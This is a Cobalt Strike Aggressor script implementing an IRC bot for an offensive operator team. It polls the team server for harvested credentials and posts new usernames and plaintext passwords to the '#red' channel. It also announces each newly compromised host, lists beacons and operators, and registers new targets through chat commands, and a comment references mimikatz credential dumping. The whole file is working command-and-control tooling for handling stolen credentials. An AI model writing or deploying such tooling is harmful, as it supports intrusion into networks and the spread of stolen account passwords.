global('%credentials'); %credentials = %(); #Get the initial credentials stored on the team server to compare against later. This is done as soon as the script executes / bot connects to server sub getCredentials { $flag = $1; #init / new_cred_check foreach $entry (credentials()) { $host = $entry['host']; $realm = $entry['realm']; $user = $entry['user']; $password = $entry['password']; $source = $entry['source']; $hostname = ""; @user_list = @(); $sizeof = size(keys(%credentials[$host])); if($sizeof ne $null) { foreach $key (keys(%credentials[$host])) { push(@user_list, $key); } } foreach $beacon (beacons()) { if($host eq $beacon['internal']) { $hostname = $beacon['computer']; } } $check = iff($user in @user_list, "true", "false"); if($check eq "false") { %credentials[$host][$user] = @($password); if($flag eq "new_cred_check") { $channel = "#red"; $msg = "\c4New account found on " . $hostname . " | IP: " . $host . " | Realm: " . $realm . " | Username: " . $user . " | Password : " . $password . " | Source: " . $source; irc_msg($handle, $channel, $msg); } } else if($check eq "true") { if($password !isin %credentials[$host][$user]) { push(%credentials[$host][$user], $password); if($flag eq "new_cred_check") { $channel = "#red"; $msg = "\c4New account found on " . $hostname . " | IP: " . $host . " | Realm: " . $realm . " | Username: " . $user . " | Password : " . $password . " | Source: " . $source; irc_msg($handle, $channel, $msg); } } } } #println(%credentials); } sub irc_close { println($1, "QUIT :Good bye!"); closef($1); } # irc_join($handle, "#armitage"); sub irc_join { println($1, "JOIN $2"); } # irc_msg($handle, "#red", "Hello World"); sub irc_msg { println($1, "PRIVMSG $2 : $+ $3"); } sub irc_connect { getCredentials("init"); local('$handle'); $handle = connect($1, $2); fork({ local('$temp'); println($handle, "PASS PASSWORD"); println($handle, "USER a b c :Cobalt Strike Bot"); println($handle, "NICK $nick"); while $temp (readln($handle)) { # keep this IRC connection alive if ("PING*" iswm $temp) { println($handle, "PONG " . substr($temp, 5)); } # extract channel messages else if ($temp ismatch ":(.*?)!.* PRIVMSG (#.*?) :(.*)") { local('$from $channel $message'); ($from $channel, $message) = matched(); fireEvent("irc_public", $handle, $from, $channel, $message); } # fire an event for everything else.. else { fireEvent("irc_other", $handle, "$temp"); } } }, \$handle, $nick => $3); return $handle; } # # example... # on irc_public { local('$handle $from $channel $text'); ($handle, $from, $channel, $text) = @_; #println("< $from $+ : $+ channel $+ > $text"); if ($text eq "!beacons") { foreach $beacon (beacons()) { irc_msg($handle, $channel, "\c7$beacon"); } } else if ($text eq "!csusers") { $listUsers = ""; $userListSize = size(users()); $i = 0; foreach $user (users()) { if($i < $userListSize) { $listUsers .= $user . ", "; } else { $listUsers .= $user; } $i++; } irc_msg($handle, $channel, "\c2Active CStrike Users: " . $listUsers); } else if($text hasmatch "!addtarget") { @split = split(" ", $text); if(size(@split) < 3 || size(@split) > 4) { irc_msg($handle, $channel, "\c7Invalid number of arguments. Syntax is !addtarget ip_addr hostname operating_system"); } else { $ipAddr = @split[1]; $hostname = @split[2]; $os = @split[3]; host_update($ipAddr, $hostname, $os, $null, $null); $msg = "\c7Added a new target with an IP Address: $ipAddr - Hostname: $hostname - OS: $os"; irc_msg($handle, $channel, $msg); } } else if($text eq "!help") { @commands = @("!beacons (outputs all beacon metadata)", "!csusers (lists users on CStrike Server)", "!help (this menu)", "!quit (makes bot disconnect)", "!addtarget ip host os (adds a new target to CStrike Server)"); $msg = "\c2Following commands are available:"; irc_msg($handle, $channel, $msg); foreach $cmd (@commands) { irc_msg($handle, $channel, "\c2$cmd"); } } else if ($text eq "!quit") { irc_msg($handle, $channel, "Good bye!"); irc_close($handle); } } on irc_other { local('$handle $text'); ($handle, $text) = @_; #println($text); # End of /MOTD command is a good time for an auto-join if (":* 422 * :*" iswm $text) { irc_join($handle, "#red"); } } on beacon_initial { $beacon_id = $1; $hostname = beacon_info($beacon_id, "computer"); $ipAddr = beacon_info($beacon_id, "host"); $user = beacon_info($beacon_id, "user"); $channel = "#red"; $msg = "\c4New beacon detected! Hostname: " . $hostname . " | IP Address: " . $ipAddr . " | User: " . $user; irc_msg($handle, $channel, $msg); } #Check for logonpasswords command, if recently executed, check credentials again to see if anything new was found on beacon_tasked { $id = $1; $output = $2; $when = $3; #println("$1 $2 $3"); #65058 Tasked beacon to run mimikatz's sekurlsa::logonpasswords command 1499470586447 } on heartbeat_1m { getCredentials("new_cred_check"); } $handle = irc_connect("localhost", 6667, "CStrikeBot");